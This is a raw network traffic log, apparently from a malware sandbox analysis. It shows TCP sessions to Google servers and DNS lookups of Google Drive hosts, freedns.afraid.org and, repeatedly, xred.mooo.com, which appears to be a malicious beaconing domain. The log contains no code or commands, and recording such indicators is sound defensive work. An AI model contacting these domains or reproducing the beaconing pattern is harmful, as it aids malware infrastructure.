                                                                                        Dec 24, 2024 22:11:48.399177074 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399190903 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399229050 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399302959 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399346113 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399346113 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399885893 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.399915934 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.400281906 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.400326014 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.400424004 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.400671005 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.400701046 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.413985014 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.414144993 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.414144993 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.414942980 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.414983988 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.415045023 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.415719032 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.415730953 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.416311979 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.416374922 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.417071104 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.417396069 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.417424917 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.132446051 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.132575989 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:50.133310080 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:50.133352041 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.134870052 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:50.134882927 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.148345947 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.148458958 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.148766041 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.148955107 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.149111032 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.149166107 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.149530888 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.149632931 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152070999 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152081013 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.152313948 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.152384996 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152698994 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152801037 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.152828932 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.153084993 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.153146982 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.153429985 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:50.195358992 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:50.195374012 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.050705910 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.050771952 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.050836086 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.050894022 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.050937891 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.050987005 CET44349853142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.051033020 CET49853443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.051584959 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.051640987 CET44349856142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.051672935 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.051691055 CET44349857142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.051714897 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.051767111 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.052058935 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.052088022 CET44349856142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.052139044 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.052164078 CET44349857142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.061897993 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.061959028 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062026978 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062064886 CET44349852142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.062113047 CET49852443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062609911 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062640905 CET44349858142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.062711000 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062869072 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:51.062896013 CET44349858142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072711945 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072757006 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072777033 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.072845936 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.072904110 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.072904110 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073353052 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073401928 CET44349851142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.073457956 CET49851443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073708057 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.073750019 CET44349859142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:51.073817968 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.074059010 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:51.074090004 CET44349859142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.429613113 CET49856443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.429728985 CET49857443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:52.429728985 CET49858443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.429761887 CET49859443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:52.430243015 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.430330038 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.430757046 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.431107998 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.431154013 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.431996107 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.432033062 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.432034969 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:52.432496071 CET49862443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:52.432507992 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.129307985 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.129405022 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.130057096 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.130163908 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.133521080 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.133549929 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.133800983 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.133857965 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.134238958 CET49861443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:54.175359964 CET44349861142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.318392038 CET44349862142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.797130108 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.797156096 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.798382998 CET49888443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.798394918 CET44349888142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801208019 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801280975 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.801325083 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801384926 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.801434040 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.801474094 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801531076 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.801757097 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.801764011 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.801808119 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.805866957 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.805919886 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.805943966 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.805969954 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.808538914 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.808547974 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.817540884 CET49889443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.817572117 CET44349889142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.821471930 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.821480036 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.821528912 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.821734905 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.821837902 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.821902037 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.824918032 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:04.824955940 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.828283072 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.828294039 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:04.847071886 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:04.847080946 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.518157959 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.518301010 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:06.518665075 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:06.518672943 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.519934893 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.520745039 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:06.520750046 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.520813942 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:06.521069050 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:06.521096945 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.522833109 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:06.522857904 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.527055979 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.527126074 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.530091047 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.530096054 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.530335903 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.530399084 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.530708075 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.552639961 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.552700043 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.554248095 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.554253101 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.554486990 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.554572105 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.554843903 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:06.571335077 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:06.595375061 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.426111937 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.426191092 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.426235914 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.426295042 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.426403999 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.426450014 CET44349900142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.426500082 CET49900443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.427234888 CET49909443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.427283049 CET44349909142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.427356005 CET49909443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.427653074 CET49909443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.427681923 CET44349909142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.434148073 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.434196949 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.434214115 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.434248924 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.434515953 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.434549093 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.434555054 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.434587955 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.441087008 CET49898443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.441099882 CET44349898142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.441741943 CET49910443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.441766977 CET44349910142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.441829920 CET49910443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.441999912 CET49910443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.442012072 CET44349910142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.569695950 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.569741011 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.569838047 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.569895983 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.570070028 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.570610046 CET49897443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.570616007 CET44349897142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.570987940 CET49911443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.571006060 CET44349911142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.571073055 CET49911443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.571232080 CET49911443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.571243048 CET44349911142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.814872980 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.814923048 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.814963102 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.814975977 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.814984083 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.815006971 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.815011978 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.815052986 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.815092087 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.815849066 CET49899443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.815859079 CET44349899142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.816345930 CET49916443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.816397905 CET44349916142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.816607952 CET49916443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.816854000 CET49916443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.816884995 CET44349916142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.883189917 CET49909443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.883213043 CET49910443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.883255005 CET49911443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.883352995 CET49916443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:07.883878946 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.883905888 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.883985996 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.884167910 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.884195089 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.884928942 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.884959936 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:07.885026932 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.885674953 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:07.885680914 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.575716972 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.575802088 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.576472998 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.576529026 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.580034971 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.580091953 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.580813885 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.580862045 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.635840893 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.635883093 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.636153936 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.636214972 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.643708944 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.656534910 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.656563044 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.656843901 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.656881094 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.659533978 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:09.687338114 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:09.703336954 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.490226984 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.490293980 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.490320921 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.490379095 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.490416050 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.490463972 CET44349917142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.490520000 CET49917443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.490920067 CET49926443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:10.490979910 CET44349926142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.491033077 CET49927443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.491056919 CET44349927142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.491081953 CET49926443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:10.491137028 CET49927443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.491281033 CET49926443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:12:10.491327047 CET44349926142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.491529942 CET49927443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.491556883 CET44349927142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.497484922 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.497531891 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.497545958 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.497581005 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.497641087 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.497659922 CET44349918142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.497700930 CET49918443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.498132944 CET49928443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.498214006 CET44349928142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.498282909 CET49928443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:12:10.498370886 CET49929443192.168.2.4142.250.181.1
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                        Dec 24, 2024 22:11:49.164690971 CET53513331.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:54.869601965 CET5575053192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:55.007740974 CET53557501.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:59.531586885 CET5846153192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:11:59.668736935 CET53584611.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:05.352777004 CET6035153192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:12:05.490787983 CET53603511.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:10.025399923 CET5182953192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:12:10.162976980 CET53518291.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 22:12:15.899920940 CET5682953192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 22:12:16.037115097 CET53568291.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 22:11:07.462415934 CET | 192.168.2.4 | 1.1.1.1 | 0xf82 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:08.324580908 CET | 192.168.2.4 | 1.1.1.1 | 0x7b74 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:08.477906942 CET | 192.168.2.4 | 1.1.1.1 | 0xfce1 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:10.653214931 CET | 192.168.2.4 | 1.1.1.1 | 0x212e | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:12.915415049 CET | 192.168.2.4 | 1.1.1.1 | 0x8bb9 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:17.588068962 CET | 192.168.2.4 | 1.1.1.1 | 0x7611 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:23.415467024 CET | 192.168.2.4 | 1.1.1.1 | 0x9438 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 24, 2024 22:11:28.088285923 CET | 192.168.2.4 | 1.1.1.1 | 0xdc0d | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
